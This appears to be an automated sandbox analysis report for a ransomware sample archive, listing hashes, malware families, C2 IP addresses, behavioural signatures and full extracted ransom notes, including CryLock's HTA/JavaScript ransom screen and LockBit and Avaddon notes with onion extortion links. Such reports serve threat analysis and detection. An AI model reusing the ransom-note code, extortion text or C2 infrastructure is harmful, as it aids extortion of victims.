Overview

overview

10

Static

static

1

RNSM00438.7z

windows10-2004-x64

10

Analysis

  • max time kernel
    84s
  • max time network
    210s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-10-2024 18:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RNSM00438.7z

  • Size

    66.5MB

  • MD5

    6aa1fd460f6a293bb4c678c6668023d1

  • SHA1

    adf38d81d249d6905dde3936972cd0b1b1ff6fab

  • SHA256

    ec32913ab37549bdee7e45ed16ab6c5ac2b52228298293fb47b86855a7a791a8

  • SHA512

    0c0c7ef472287121e65504ba4e0d91805106f8ad6555553e8742b13de854369ca61ec6aa664808266c13e0c0bcc4ae4bcfd23417cd1451447f762a58a618541d

  • SSDEEP

    1572864:S08JJ5gp1eUb7NeRCwxTUsv4DK3emG/i6Eza+9sFVB4+cXfy:S+jbsR1T+mOA6G19a

Score
10/10
avaddoncrimsonratcrylockechelongandcrablockbitmafiaware666modiloaderurelasvanillaratxmrigagilenetbackdoordefense_evasiondiscoveryevasionexecutionimpactminerpersistenceransomwareratspywarestealertrojan

Malware Config

Extracted

Family

crimsonrat

C2

173.249.50.57

12.15.206.118

Extracted

Family

crylock

Attributes
  • emails

    [email protected]

  • ransomnote

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <title>CryLock</title> <hta:application showInTaskBar="no" APPLICATION="yes" ICON='msiexec.exe' SINGLEINSTANCE='yes' SysMenu="no" applicationname="CryLock" border="thick" contexmenu="no" scroll="no" selection="yes" singleinstance="yes" windowstate="normal" MAXIMIZEBUTTON="NO" BORDER="DIALOG" width="100" height="100" MINIMIZEBUTTON="NO"></hta:application> <script language="JavaScript"> var ud=0; var op=0xc7bf30; var zoc=0; function document.onkeydown() { var alt=window.event.altKey; if (event.keyCode==116 || event.keyCode==27 || alt && event.keyCode==115) { event.keyCode=0; event.cancelBubble=true; return false; } } function document.onblur() { alert('Attention! This important information for you!'); } function ChangeTime() { var sd = new Date('<%DOUBLE_DATETIME%>'); var dn = new Date(); if (sd.getTime()<dn.getTime()) { var dt=document.getElementById('pwr'); dt.innerHTML='<font color="red" size="5"><b>Price is raised!</b></font>'; dt.style.height=78; zoc=1; } else { var delta=sd.getTime()-dn.getTime(); delta=new Date(delta); var dd=(delta.getUTCDate()-1)+((delta.getUTCMonth())*31); var hh=delta.getUTCHours(); var mm=delta.getUTCMinutes(); var ss=delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } var dt=document.getElementById('dt'); dt.innerHTML='<font face="monospace" color="#c2c2c2" size="4"><b>'+dd+' '+hh+':'+mm+':'+ss+'</b></font>'; } var sd = new Date('<%UNDECRYPT_DATETIME%>'); dn = new Date(); if (sd.getTime()<dn.getTime()) { var dt=document.getElementById('lctw'); dt.innerHTML='<font color="red" size="5"><b>Last chance to decrypt your files!</b></font>'; zoc=2; } else { var delta=sd.getTime()-dn.getTime(); delta=new Date(delta); var dd=(delta.getUTCDate()-1)+((delta.getUTCMonth())*31); var hh=delta.getUTCHours(); var mm=delta.getUTCMinutes(); var ss=delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } var dt=document.getElementById('et'); dt.innerHTML='<font face="monospace" color="#c2c2c2" size="4"><b>'+dd+' '+hh+':'+mm+':'+ss+'</b></font>'; } } function getRandomArbitrary(min, max) { min = Math.ceil(min); max = Math.floor(max); return Math.floor(Math.random() * (max - min)) + min; } function Rndom() { document.getElementById("blumid").focus(); var bid=document.getElementById('blumid'); var bem=document.getElementById('blummail'); if (ud==0) { op=op-0x10; } else { op=op+0x10; } if (op<=0xc00000) { ud=1; } if (op>=0xc7bf30) { ud=0; } bid.style.backgroundColor=op; bem.style.backgroundColor=op; var xx=''; var i=0; while (i<19) { xx=xx+getRandomArbitrary(0,2); i=i+1; } if (zoc==0) { var dt=document.getElementById('rc'); rc.innerHTML='<font face="monospace" color="white" size="5"><b>'+xx+'</b></font>'; } else { if (zoc==1) { var dt=document.getElementById('rc'); rc.innerHTML='<font face="monospace" color="red" size="5"><b>Price is raised!</b></font>'; } else { var dt=document.getElementById('rc'); rc.innerHTML='<font face="monospace" color="red" size="4"><b>Price is raised!<br>Last chance to decrypt your files!</b></font>'; } } } function Start() { window.resizeTo(800,500) setInterval(ChangeTime,1000); setInterval(Rndom,100); } function copytext(s) { window.clipboardData.setData("Text",s); alert(s+' copied to clipboard'); } function Restart() { alert('Attention! This important information for you!'); } </script> <body style="background-color:#0066CC;" OnLoad="Start()"> <div id="pwr" align="center" style="position:absolute; top:10px; left:10px; width:20%; border: 2px solid #c2c2c2;"> <font color="#c7bf30"><b>Payment will be raised after</b></font> <br> <div id="dt"> <font face="monospace" color="#c2c2c2" size="4">-- days --:--:--</font> </div> </div> <div align="center" style="position:absolute; top:10px; left:170px; width:58%;"> <font face="monospace" color="white" size="4"><b>Your files have been encrypted...</b></font> </div> <div align="center" style="position:absolute; top:60px; left:170px; width:58%;"> <div id="rc"> <font face="monospace" color="white" size="5"><b>00000000000000000000</b></font> </div> </div> <div id="lctw" align="center" style="position:absolute; top:10px; left:620px; width:20%; border: 2px solid #c2c2c2;"> <font color="#c7bf30"><b>Your files will be leaked after</b></font> <br> <div id="et"> <font face="monospace" color="#c2c2c2" size="4">-- days --:--:--</font> </div> </div> <div style="background-color:white;overflow-x:hide; overflow-y:scroll; position:absolute; top:100px; left:10px; width:768px; height:320px"> Decrypt files? Write to this mails: <font face="monospace" OnClick="copytext('<%MAIN_CONTACT%>')"><b><%MAIN_CONTACT%></b></font> or <font face="monospace" OnClick="copytext ('<[email protected]>')"><b><[email protected]></b></font>. Reserve telegram <font face="monospace" OnClick="copytext('@assist_decoder')"><b>@assist_decoder</b></font>. <br> Your unique ID <font face="monospace" OnClick="copytext('[<%HID%>]')"><b>[<%HID%>] <font size="2">[copy]</font></b></font> <br> <font color="#ff0000 ">Warning! All your data was extracted and copied! If you don't contact us, it will be sold and uploaded to public sources!</font> </div> <div title="Click to copy" OnClick="copytext('[<%HID%>]')" id="blumid" style="cursor:pointer;background-color:#c7bf30; position:absolute; top:430px; left:10px; width:380px; height:20px"> <b>Your ID [<%HID%>] <font size="2">[copy]</font></b> </div> <div title="Click to copy" OnClick="copytext('<%MAIN_CONTACT%>')" id="blummail" style="cursor:pointer;background-color:#c7bf30; position:absolute; top:430px; left:400px; width:380px; height:20px"> <b>Write to <%MAIN_CONTACT%> <font size="2">[copy]</font></b> </div> </body> </html>

rsa_pubkey.plain

Extracted

Family

urelas

C2

1.234.83.146

133.242.129.155

218.54.31.226

218.54.30.235

218.54.31.165

Extracted

Path

C:\Program Files\Restore-My-Files.txt

Family

lockbit

Ransom Note
All your important files are encrypted! Any attempts to restore your files with the thrid-party software will be fatal for your files! RESTORE YOU DATA POSIBLE ONLY BUYING private key from us. There is only one way to get your files back: 1) Through a standard browser(FireFox, Chrome, Edge, Opera) | 1. Open link http://lockbit-decryptor.top/?8C77A1CE29FCE870D9309D82AC4C6C42 | 2. Follow the instructions on this page 2) Through a Tor Browser - recommended | 1. Download Tor browser - https://www.torproject.org/ and install it. | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?8C77A1CE29FCE870D9309D82AC4C6C42 This link only works in Tor Browser! | 3. Follow the instructions on this page ### Attention! ### # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site # Do not rename encrypted files. # Do not try to decrypt using third party software, it may cause permanent data loss. # Decryption of your files with the help of third parties may cause increased price(they add their fee to our). # Tor Browser may be blocked in your country or corporate network. Use https://bridges.torproject.org or use Tor Browser over VPN. # Tor Browser user manual https://tb-manual.torproject.org/about
URLs

http://lockbit-decryptor.top/?8C77A1CE29FCE870D9309D82AC4C6C42

http://lockbitks2tvnmwk.onion/?8C77A1CE29FCE870D9309D82AC4C6C42

Extracted

Path

C:\Users\Admin\Desktop\00438\Qpinj_readme_.txt

Family

avaddon

Ransom Note
-------=== Your network has been infected! ===------- ***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************** All your documents, photos, databases and other important files have been encrypted and have the extension: .bdeAeCDaAD You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files! The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files! We have also downloaded a lot of private data from your network. If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info. You can get more information on our page, which is located in a Tor hidden network. How to get to our page -------------------------------------------------------------------------------- | | 1. Download Tor browser - https://www.torproject.org/ | | 2. Install Tor browser | | 3. Open link in Tor browser - avaddonbotrxmuyl.onion | | 4. Follow the instructions on this page | -------------------------------------------------------------------------------- Your ID: -------------------------------------------------------------------------------- MjAwNC1GK2FOeHFnNFNWRHVxWVM3eWZ5RnFHcnBVV25Kcm9lTHM0QzNLSWEraktnVEorTE40Y2g1WHV3dGtpYklyOFA3SmlXcnRrTTlGUU1OTkJrVDVSMDdrZzN1U3Y2NnZqcm0zTWlGMUVjdklIZllLN3J6SGgzUk9hK3J6TThHSkx3V2x0UEpxQkZ0dVJtbHZWbmdPZis0U2lUMHRIV3JIbHB6bCt6RC9YMmhPZHM2U3JUajgya1lxMk9sYXFNK3kxcGx0MVJWRzRKMklBWWFyNE1waTZCWm5nNldFd1U1OXd2b25McDR5NlhRZGpOaU5KMS9vcXpJY0lwRTRPNzdJSjJkRXpVYVpkcFVvcWZMV3RmWG1VdjNYdmVWYUNsSEsvQmprckdVZmZqYk1ucytDK29LMVczeVRJbXhRUkZQVVhLaW5leWZlcU95d2FadFJSK0dHVnlvdUYxa2dlSHgxOWV4aFNOMmtQYVhqa2dIWlRyb0xZSitUTE5adGlGSWVNY0lRalhLNCtTQmxQQUVYRzg5UlpyZlVjYVhwSHY0UVNkQTRnMXFKeVVQdUgxSit5eXZoeWY4VVFvd1BLOXpIK0pFZklwdGw5OXpJVmhMcldYNTArMlRqek5Kd2I5S2JFVGRsclFBQ3pDTXlqaDRtVkVMbkNkNTJaZ3dsS0FTdWo2bG1OQTB0RzRHUnJDVWxwb1pteGE2OTJwZzA3M1JSMjJydmh2ZW9CeGFqakgrLzAzQWRZNWhCYWpKRy9SSWpZMjdhRStadFEyVTVOakRhT0FjNzdOWi9RVktXSFNCZVRBSVBoN0VCRWcvRTZYRE9WeHdwWFRWYXNzek9KbUZ1ZElabVp6cHJlWXUrMks1NG5mL08ydzUxQUJ5OEQ3ZC9YOTFKQ1lsSWJ5OEZLVXdZSHozb0NkYWJRKzZ5UTE1Rjl0MmFPOGxKaU12anFpbmRIYWtUdVI1Snlva3NwTEp5WXRFNThHY0FIOS92SFY2V0NkQW1sZkhSeDVVKzM1Z05rYWJ6WDhMeWFUb0luWFRiN0VqalUzbjJiLzFFalFjMU5yNjNNL3dUSlZ3ZVdEeDFJYzc0YXM2SHRyQ0lSUnVHbWdYQ2xVTUYxN044NktvWmIxa2k4NktRS0pFVUJ1RXg1VlVOc1dKNmRibEF6QnZYTjRwV2F0cU5IaWkzcTZndVF0MWRreVlobm9PZHBEZjJNVlhhYllLRnFWcmFVM1VmaHIrRzlxQVF1VDFwYjlOVWRzcXBRT05tdnlVNXIxYUlRQXVDbkdHWE1MM0pqa2ovYWsyQTZQckoxdFZGbTBNeFl2cjN0NldodFpiM091dXgwdXRWVGdYNjVpK1lKVWVSUFlVZ0w2ZHI1TTJxaFFiN253bjhDemxVSWVPaENBdzVHdkI3NHZ3SXM0YUtOWXM2L3AwUUNTRzlSS1lpL0FCdW9Lc2dGSVpEbVNZNGhFa3g5SGtsZ0JweTRVU0I2T3RNYWxiTmxhWG9GdWFCN2phd1Z3RWNnMUM3M3ROOXJiempHNzRkNWhjeldRcXI4eGlOT2R3TlNFalZCWnhFY3lGM2hqRFc4S1QxNWFwU1N1cis4cHVhTG5kanhBSHhac1VVY084U1BHaG04QWNZTFFCS3NsaDhGY3NjdVVzR1p2TzkxNS9QUDdrUGdmcXhLU0VmQmRPMUI0bGExZzFrUUFJeTRNVGpJUDltQlZZZ3JPNW5WUHNINXpndUNqTVBJSXRBY0d6K3NFQkhBUmlMYVZ4YmpsWlJmM2hlc0VENmtQQmxMMnN1T1pCTktsaGxWNUk0UGd2S2hrNTVzYmlVOWl0R2hMam9EYTFNY3lvYkM3SXRaSmZuVDBMQks1akNUUTRXdjVVbjZDSnVlY0dTSVdwbGtzWWlsK3p3Z1hpSHEzdEgwU2JiYnlWYnhNWWpURkt3Wmc3RkdjeFdJVjJjc1JKWFJXbERhNHhYZHcvQlN3SEEyUHhmcFJEK1hQMG1hM0dhZTgwanFaOVg1enBTWlpZa0w0cHptREVjSldJb3JmYVFyRjh2TGhVcjlnZFVlQ05DWkVjOE1UMEQ3N0FnL1MyNFJ6NWRnd2hLVWIvSW5OeVlTOUZkTytYS25Bc21jR2dOTmJHeGNQV3hZMkJyenQ4NlZ4aUxZM2tudz09 -------------------------------------------------------------------------------- * DO NOT TRY TO RECOVER FILES YOURSELF! * DO NOT MODIFY ENCRYPTED FILES! * * * OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER! * * * l
URLs

http://avaddongun7rngel.onion

http://avaddonbotrxmuyl.onion

Extracted

Path

C:\Users\Admin\Documents\Qpinj_readme_.txt

Family

avaddon

Ransom Note
-------=== Your network has been infected! ===------- ***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************** All your documents, photos, databases and other important files have been encrypted and have the extension: .bdeAeCDaAD You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files! The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files! We have also downloaded a lot of private data from your network. If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info. You can get more information on our page, which is located in a Tor hidden network. How to get to our page -------------------------------------------------------------------------------- | | 1. Download Tor browser - https://www.torproject.org/ | | 2. Install Tor browser | | 3. Open link in Tor browser - avaddonbotrxmuyl.onion | | 4. Follow the instructions on this page | -------------------------------------------------------------------------------- Your ID: -------------------------------------------------------------------------------- MjAwNC1GK2FOeHFnNFNWRHVxWVM3eWZ5RnFHcnBVV25Kcm9lTHM0QzNLSWEraktnVEorTE40Y2g1WHV3dGtpYklyOFA3SmlXcnRrTTlGUU1OTkJrVDVSMDdrZzN1U3Y2NnZqcm0zTWlGMUVjdklIZllLN3J6SGgzUk9hK3J6TThHSkx3V2x0UEpxQkZ0dVJtbHZWbmdPZis0U2lUMHRIV3JIbHB6bCt6RC9YMmhPZHM2U3JUajgya1lxMk9sYXFNK3kxcGx0MVJWRzRKMklBWWFyNE1waTZCWm5nNldFd1U1OXd2b25McDR5NlhRZGpOaU5KMS9vcXpJY0lwRTRPNzdJSjJkRXpVYVpkcFVvcWZMV3RmWG1VdjNYdmVWYUNsSEsvQmprckdVZmZqYk1ucytDK29LMVczeVRJbXhRUkZQVVhLaW5leWZlcU95d2FadFJSK0dHVnlvdUYxa2dlSHgxOWV4aFNOMmtQYVhqa2dIWlRyb0xZSitUTE5adGlGSWVNY0lRalhLNCtTQmxQQUVYRzg5UlpyZlVjYVhwSHY0UVNkQTRnMXFKeVVQdUgxSit5eXZoeWY4VVFvd1BLOXpIK0pFZklwdGw5OXpJVmhMcldYNTArMlRqek5Kd2I5S2JFVGRsclFBQ3pDTXlqaDRtVkVMbkNkNTJaZ3dsS0FTdWo2bG1OQTB0RzRHUnJDVWxwb1pteGE2OTJwZzA3M1JSMjJydmh2ZW9CeGFqakgrLzAzQWRZNWhCYWpKRy9SSWpZMjdhRStadFEyVTVOakRhT0FjNzdOWi9RVktXSFNCZVRBSVBoN0VCRWcvRTZYRE9WeHdwWFRWYXNzek9KbUZ1ZElabVp6cHJlWXUrMks1NG5mL08ydzUxQUJ5OEQ3ZC9YOTFKQ1lsSWJ5OEZLVXdZSHozb0NkYWJRKzZ5UTE1Rjl0MmFPOGxKaU12anFpbmRIYWtUdVI1Snlva3NwTEp5WXRFNThHY0FIOS92SFY2V0NkQW1sZkhSeDVVKzM1Z05rYWJ6WDhMeWFUb0luWFRiN0VqalUzbjJiLzFFalFjMU5yNjNNL3dUSlZ3ZVdEeDFJYzc0YXM2SHRyQ0lSUnVHbWdYQ2xVTUYxN044NktvWmIxa2k4NktRS0pFVUJ1RXg1VlVOc1dKNmRibEF6QnZYTjRwV2F0cU5IaWkzcTZndVF0MWRreVlobm9PZHBEZjJNVlhhYllLRnFWcmFVM1VmaHIrRzlxQVF1VDFwYjlOVWRzcXBRT05tdnlVNXIxYUlRQXVDbkdHWE1MM0pqa2ovYWsyQTZQckoxdFZGbTBNeFl2cjN0NldodFpiM091dXgwdXRWVGdYNjVpK1lKVWVSUFlVZ0w2ZHI1TTJxaFFiN253bjhDemxVSWVPaENBdzVHdkI3NHZ3SXM0YUtOWXM2L3AwUUNTRzlSS1lpL0FCdW9Lc2dGSVpEbVNZNGhFa3g5SGtsZ0JweTRVU0I2T3RNYWxiTmxhWG9GdWFCN2phd1Z3RWNnMUM3M3ROOXJiempHNzRkNWhjeldRcXI4eGlOT2R3TlNFalZCWnhFY3lGM2hqRFc4S1QxNWFwU1N1cis4cHVhTG5kanhBSHhac1VVY084U1BHaG04QWNZTFFCS3NsaDhGY3NjdVVzR1p2TzkxNS9QUDdrUGdmcXhLU0VmQmRPMUI0bGExZzFrUUFJeTRNVGpJUDltQlZZZ3JPNW5WUHNINXpndUNqTVBJSXRBY0d6K3NFQkhBUmlMYVZ4YmpsWlJmM2hlc0VENmtQQmxMMnN1T1pCTktsaGxWNUk0UGd2S2hrNTVzYmlVOWl0R2hMam9EYTFNY3lvYkM3SXRaSmZuVDBMQks1akNUUTRXdjVVbjZDSnVlY0dTSVdwbGtzWWlsK3p3Z1hpSHEzdEgwU2JiYnlWYnhNWWpURkt3Wmc3RkdjeFdJVjJjc1JKWFJXbERhNHhYZHcvQlN3SEEyUHhmcFJEK1hQMG1hM0dhZTgwanFaOVg1enBTWlpZa0w0cHptREVjSldJb3JmYVFyRjh2TGhVcjlnZFVlQ05DWkVjOE1UMEQ3N0FnL1MyNFJ6NWRnd2hLVWIvSW5OeVlTOUZkTytYS25Bc21jR2dOTmJHeGNQV3hZMkJyenQ4NlZ4aUxZM2tudz09 -------------------------------------------------------------------------------- * DO NOT TRY TO RECOVER FILES YOURSELF! * DO NOT MODIFY ENCRYPTED FILES! * * * OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER! * * * b9f
URLs

http://avaddongun7rngel.onion

http://avaddonbotrxmuyl.onion

Extracted

Path

C:\Users\Admin\Music\Qpinj_readme_.txt

Family

avaddon

Ransom Note
-------=== Your network has been infected! ===------- ***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************** All your documents, photos, databases and other important files have been encrypted and have the extension: .bdeAeCDaAD You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files! The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files! We have also downloaded a lot of private data from your network. If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info. You can get more information on our page, which is located in a Tor hidden network. How to get to our page -------------------------------------------------------------------------------- | | 1. Download Tor browser - https://www.torproject.org/ | | 2. Install Tor browser | | 3. Open link in Tor browser - avaddonbotrxmuyl.onion | | 4. Follow the instructions on this page | -------------------------------------------------------------------------------- Your ID: -------------------------------------------------------------------------------- MjAwNC1GK2FOeHFnNFNWRHVxWVM3eWZ5RnFHcnBVV25Kcm9lTHM0QzNLSWEraktnVEorTE40Y2g1WHV3dGtpYklyOFA3SmlXcnRrTTlGUU1OTkJrVDVSMDdrZzN1U3Y2NnZqcm0zTWlGMUVjdklIZllLN3J6SGgzUk9hK3J6TThHSkx3V2x0UEpxQkZ0dVJtbHZWbmdPZis0U2lUMHRIV3JIbHB6bCt6RC9YMmhPZHM2U3JUajgya1lxMk9sYXFNK3kxcGx0MVJWRzRKMklBWWFyNE1waTZCWm5nNldFd1U1OXd2b25McDR5NlhRZGpOaU5KMS9vcXpJY0lwRTRPNzdJSjJkRXpVYVpkcFVvcWZMV3RmWG1VdjNYdmVWYUNsSEsvQmprckdVZmZqYk1ucytDK29LMVczeVRJbXhRUkZQVVhLaW5leWZlcU95d2FadFJSK0dHVnlvdUYxa2dlSHgxOWV4aFNOMmtQYVhqa2dIWlRyb0xZSitUTE5adGlGSWVNY0lRalhLNCtTQmxQQUVYRzg5UlpyZlVjYVhwSHY0UVNkQTRnMXFKeVVQdUgxSit5eXZoeWY4VVFvd1BLOXpIK0pFZklwdGw5OXpJVmhMcldYNTArMlRqek5Kd2I5S2JFVGRsclFBQ3pDTXlqaDRtVkVMbkNkNTJaZ3dsS0FTdWo2bG1OQTB0RzRHUnJDVWxwb1pteGE2OTJwZzA3M1JSMjJydmh2ZW9CeGFqakgrLzAzQWRZNWhCYWpKRy9SSWpZMjdhRStadFEyVTVOakRhT0FjNzdOWi9RVktXSFNCZVRBSVBoN0VCRWcvRTZYRE9WeHdwWFRWYXNzek9KbUZ1ZElabVp6cHJlWXUrMks1NG5mL08ydzUxQUJ5OEQ3ZC9YOTFKQ1lsSWJ5OEZLVXdZSHozb0NkYWJRKzZ5UTE1Rjl0MmFPOGxKaU12anFpbmRIYWtUdVI1Snlva3NwTEp5WXRFNThHY0FIOS92SFY2V0NkQW1sZkhSeDVVKzM1Z05rYWJ6WDhMeWFUb0luWFRiN0VqalUzbjJiLzFFalFjMU5yNjNNL3dUSlZ3ZVdEeDFJYzc0YXM2SHRyQ0lSUnVHbWdYQ2xVTUYxN044NktvWmIxa2k4NktRS0pFVUJ1RXg1VlVOc1dKNmRibEF6QnZYTjRwV2F0cU5IaWkzcTZndVF0MWRreVlobm9PZHBEZjJNVlhhYllLRnFWcmFVM1VmaHIrRzlxQVF1VDFwYjlOVWRzcXBRT05tdnlVNXIxYUlRQXVDbkdHWE1MM0pqa2ovYWsyQTZQckoxdFZGbTBNeFl2cjN0NldodFpiM091dXgwdXRWVGdYNjVpK1lKVWVSUFlVZ0w2ZHI1TTJxaFFiN253bjhDemxVSWVPaENBdzVHdkI3NHZ3SXM0YUtOWXM2L3AwUUNTRzlSS1lpL0FCdW9Lc2dGSVpEbVNZNGhFa3g5SGtsZ0JweTRVU0I2T3RNYWxiTmxhWG9GdWFCN2phd1Z3RWNnMUM3M3ROOXJiempHNzRkNWhjeldRcXI4eGlOT2R3TlNFalZCWnhFY3lGM2hqRFc4S1QxNWFwU1N1cis4cHVhTG5kanhBSHhac1VVY084U1BHaG04QWNZTFFCS3NsaDhGY3NjdVVzR1p2TzkxNS9QUDdrUGdmcXhLU0VmQmRPMUI0bGExZzFrUUFJeTRNVGpJUDltQlZZZ3JPNW5WUHNINXpndUNqTVBJSXRBY0d6K3NFQkhBUmlMYVZ4YmpsWlJmM2hlc0VENmtQQmxMMnN1T1pCTktsaGxWNUk0UGd2S2hrNTVzYmlVOWl0R2hMam9EYTFNY3lvYkM3SXRaSmZuVDBMQks1akNUUTRXdjVVbjZDSnVlY0dTSVdwbGtzWWlsK3p3Z1hpSHEzdEgwU2JiYnlWYnhNWWpURkt3Wmc3RkdjeFdJVjJjc1JKWFJXbERhNHhYZHcvQlN3SEEyUHhmcFJEK1hQMG1hM0dhZTgwanFaOVg1enBTWlpZa0w0cHptREVjSldJb3JmYVFyRjh2TGhVcjlnZFVlQ05DWkVjOE1UMEQ3N0FnL1MyNFJ6NWRnd2hLVWIvSW5OeVlTOUZkTytYS25Bc21jR2dOTmJHeGNQV3hZMkJyenQ4NlZ4aUxZM2tudz09 -------------------------------------------------------------------------------- * DO NOT TRY TO RECOVER FILES YOURSELF! * DO NOT MODIFY ENCRYPTED FILES! * * * OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER! * * * yHmPjmr
URLs

http://avaddongun7rngel.onion

http://avaddonbotrxmuyl.onion

Signatures

  • Avaddon

    Ransomware-as-a-service first released in June 2020 and currently expanding its userbase among criminal actors.

    ransomwareavaddon
  • Avaddon family
    avaddon
  • Avaddon payload 1 IoCs
  • CrimsonRAT main payload 1 IoCs
  • CrimsonRat

    Crimson RAT is a malware linked to a Pakistani-linked threat actor.

    ratcrimsonrat
  • Crimsonrat family
    crimsonrat
  • Crylock

    Ransomware family, which is a new variant of Cryakl ransomware.

    ransomwarecrylock
  • Crylock family
    crylock
  • Detect MafiaWare666 ransomware 2 IoCs
  • Detects Echelon Stealer payload 2 IoCs
  • Disables service(s) 3 TTPs
    evasionexecution
  • Echelon

    Echelon is a .NET stealer that targets passwords from browsers, email and cryptocurrency clients.

    stealerspywareechelon
  • Echelon family
    echelon
  • GandCrab payload 5 IoCs
  • Gandcrab

    Gandcrab is a Trojan horse that encrypts files on a computer.

    ransomwarebackdoorgandcrab
  • Gandcrab family
    gandcrab
  • Lockbit

    Ransomware family with multiple variants released since late 2019.

    ransomwarelockbit
  • Lockbit family
    lockbit
  • MafiaWare666 Ransomware

    MafiaWare666 is ransomware written in C# with multiple variants.

    ransomwaremafiaware666
  • Mafiaware666 family
    mafiaware666
  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

    trojanmodiloader
  • Modiloader family
    modiloader
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs 2 IoCs
    evasiontrojan
  • Urelas

    Urelas is a trojan targeting card games.

    trojanurelas
  • Urelas family
    urelas
  • VanillaRat

    VanillaRat is an advanced remote administration tool coded in C#.

    ratvanillarat
  • Vanillarat family
    vanillarat
  • Xmrig family
    xmrig
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • ModiLoader Second Stage 1 IoCs
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Renames multiple (238) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Renames multiple (952) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Vanilla Rat payload 2 IoCs
    rat
  • XMRig Miner payload 8 IoCs
    miner
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

    ransomware
  • Modifies Windows Firewall 2 TTPs 2 IoCs
    evasion
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 15 IoCs
  • Modifies file permissions 1 TTPs 3 IoCs
    discovery
  • Obfuscated with Agile.Net obfuscator 2 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

    agilenet
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Drops desktop.ini file(s) 28 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

    discovery
  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

    discovery
  • Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Discovers systems in the same network 1 TTPs 1 IoCs
    discovery
  • Interacts with shadow copies 3 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies registry class 2 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
    evasion
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00438.7z"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
